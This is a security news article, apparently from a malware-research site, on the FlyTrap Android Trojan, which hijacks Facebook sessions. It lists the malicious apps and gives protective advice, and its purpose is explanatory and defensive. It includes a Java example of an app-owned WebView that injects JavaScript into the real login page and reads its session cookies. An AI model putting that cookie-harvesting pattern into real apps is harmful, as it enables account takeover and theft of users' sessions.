Facebook accounts hijacked by Android malware “FlyTrap”

New malware campaign targets Facebook users on mobile

Image caption: FlyTrap has been active since March 2021, targeting Android users

Zimperium’s zLabs mobile threat research team released a report[1] on a new Android Trojan[2] called “FlyTrap”, active since March 2021 with more than 10,000 victims across 144 countries. It spreads through hijacked social media accounts and third-party app stores and uses social engineering[3] to take over personal “Facebook” accounts. The previously undetected campaign is attributed to operators based in Vietnam.

“Facebook” is a popular social media platform, which is what makes its accounts valuable. A hijacked account can boost the reach of pages spreading false information or political propaganda, and the attackers can post from it to push the malware to the victim’s “Facebook” friends, who then infect their own friends in turn.[4]

The malicious applications were initially distributed through Google Play as well as third-party app stores. Once the findings reached Google, it verified the research and removed the applications from Google Play, but they remain available on unvetted third-party stores.

The malicious applications carrying the Trojan include (package name: app name):

  • com.luxcarad.cardid: GG Voucher
  • com.gardenguides.plantingfree: Vote European Football
  • com.free_coupon.gg_free_coupon: GG Coupon Ads
  • com.m_application.app_moi_6: GG Voucher Ads
  • com.free.voucher: GG Voucher
  • com.ynsuper.chatfuel: Chatfuel
  • com.free_coupon.net_coupon: Net Coupon
  • com.movie.net_coupon: Net Coupon
  • com.euro2021: EURO 2021 Official

The threat actors exploited human weaknesses and an “act first, think later” mindset with apps that promised free “Netflix” and “AdWords” coupon codes or let users vote for football teams and players. The apps’ polished design and engaging content kept suspicion low.

Tricks used by FlyTrap to infect users

A Trojan generally masquerades as a legitimate program when it is in fact a fake version carrying malicious code. This one targets Android devices specifically to steal information about the victim’s social media accounts.

After installing the app, the user is asked to log into “Facebook” to redeem the coupon. Pressing “Continue with Facebook” opens the genuine “Facebook” login page, but inside a WebView that belongs to the app rather than in the browser. Because the app owns that WebView, it can inject its own JavaScript into the legitimate page and read the page contents and cookies once the user has logged in. The login page is the real one, so the user sees nothing suspicious; the session is hijacked on the attacker’s side of the window.
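The following Android snippet is an added illustration of the pattern just described and is not FlyTrap’s code: an app-owned WebView loading a real login page, with script injected after the page loads and the cookie jar read by the host app, placed beside the login flow a legitimate app should use instead (a Chrome Custom Tab, which is also what the official Facebook Login SDK falls back to). The URLs, the `Collector` sink and the `myapp://callback` redirect are assumptions made for the example; the `c_user` cookie is Facebook’s account-ID cookie.

```java
import android.content.Context;
import android.net.Uri;
import android.util.Log;
import android.webkit.CookieManager;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import androidx.browser.customtabs.CustomTabsIntent;

// Illustration only: the dangerous WebView pattern beside the safe one.
public class LoginFlows {

    // URLs assumed for the example.
    static final String LOGIN_URL = "https://m.facebook.com/login";
    static final String OAUTH_URL = "https://www.facebook.com/dialog/oauth"
            + "?client_id=APP_ID&redirect_uri=myapp%3A%2F%2Fcallback&response_type=code";

    // --- Dangerous pattern: app-owned WebView plus injected JavaScript ------
    // The page shown is the genuine login page, so the user sees nothing odd.
    // But the WebView runs inside the app's process, and the app controls it.
    public static WebView hijackingWebView(Context ctx) {
        WebView wv = new WebView(ctx);
        wv.getSettings().setJavaScriptEnabled(true);
        wv.setWebViewClient(new WebViewClient() {
            @Override
            public void onPageFinished(WebView view, String url) {
                if (!url.contains("facebook.com")) return;
                // 1. Script injected into the loaded page runs with the page's
                //    own origin, so it can read the DOM and every cookie that
                //    is not marked HttpOnly (c_user carries the account ID).
                view.evaluateJavascript(
                        "(function(){var m=document.cookie.match(/c_user=(\\d+)/);"
                      + "return JSON.stringify({uid:m?m[1]:null,title:document.title});})()",
                        value -> Collector.record("page", value));
                // 2. The host app does not even need JavaScript for the session:
                //    the WebView cookie jar is readable by the app directly.
                //    HttpOnly only stops scripts inside the page, not the process
                //    that hosts the WebView.
                String sessionCookies = CookieManager.getInstance().getCookie(url);
                Collector.record("cookies", sessionCookies);
            }
        });
        wv.loadUrl(LOGIN_URL);
        return wv;
    }

    // --- Safe pattern: hand the login to the system browser -----------------
    // A Custom Tab runs in the browser's process. The app cannot inject script
    // or read the browser's cookies; all it ever receives is the OAuth redirect
    // delivered to an <intent-filter> for myapp://callback in the manifest
    // (assumed, not shown).
    public static void safeLogin(Context ctx) {
        CustomTabsIntent tab = new CustomTabsIntent.Builder().build();
        tab.launchUrl(ctx, Uri.parse(OAUTH_URL));
    }

    // Hypothetical sink standing in for the malware's upload to its C2 server.
    static class Collector {
        static void record(String kind, String value) {
            Log.d("Collector", kind + "=" + value);
        }
    }
}
```

The practical check for a user is therefore not whether the login page looks real (it is real) but where it is displayed: a login form that appears inside an unknown app’s own window, without the browser’s address bar or a switch to the “Facebook” app, is exactly the situation this malware exploits.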

Once the user has logged in through that window, the victim’s Facebook ID, location, email address, IP address and the cookies tied to the Facebook session are sent to the attackers. zLabs researchers said:

These hijacked Facebook sessions can be used to spread the malware by abusing the victim’s social credibility through personal messaging with links to the Trojan, as well as propagating propaganda or disinformation campaigns using the victim’s geolocation details. These social engineering techniques are highly effective in the digitally connected world and are used often by cybercriminals to spread malware from one victim to another.

After logging in, users expecting a free coupon code got nothing. To make the failure look plausible, the apps displayed a message saying that the coupon had “expired after redemption and before spending.”

The command-and-control (C2) server requires login credentials before it grants access to the harvested data, but the researchers found a flaw in that authentication which let them retrieve the collected session cookies.

Protect your device and information from malware

There are steps you can take to protect yourself from Trojans like “FlyTrap”. Android blocks installation from unknown sources by default, so keep that protection in place. On older Android versions the switch is under Settings > Security > “Unknown sources”, which should stay unchecked; on Android 8 and later the permission is granted per app under Settings > Apps > Special app access > “Install unknown apps”, where no browser, messenger or file manager should be allowed to install packages. Google Play is not a guarantee either, since these apps were listed there until Google removed them, so the package names above are worth checking against the apps installed on your device.

Multi-factor authentication (MFA) adds a valuable layer of security to any social media account, and “Facebook” can also send login alerts when someone signs in from an unrecognised device or location. Be clear about what MFA does not cover, though: FlyTrap steals an already authenticated session cookie, so the attacker never sees a login prompt and MFA is never triggered. If you suspect your “Facebook” account has been compromised, follow “Facebook” instructions to log out of all sessions on all devices (which invalidates the stolen cookies), change your password and enable MFA.

Be aware of what an application asks for, and consider whether the deal is too good to be true. Ask why the application wants you to log into your social media account at all. Find the Terms of Use and the Privacy Policy and read them to learn how your information will be used before granting permission. Once you have handed over your data, you cannot take it back.

About the author
Gabriel E. Hall, web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.

References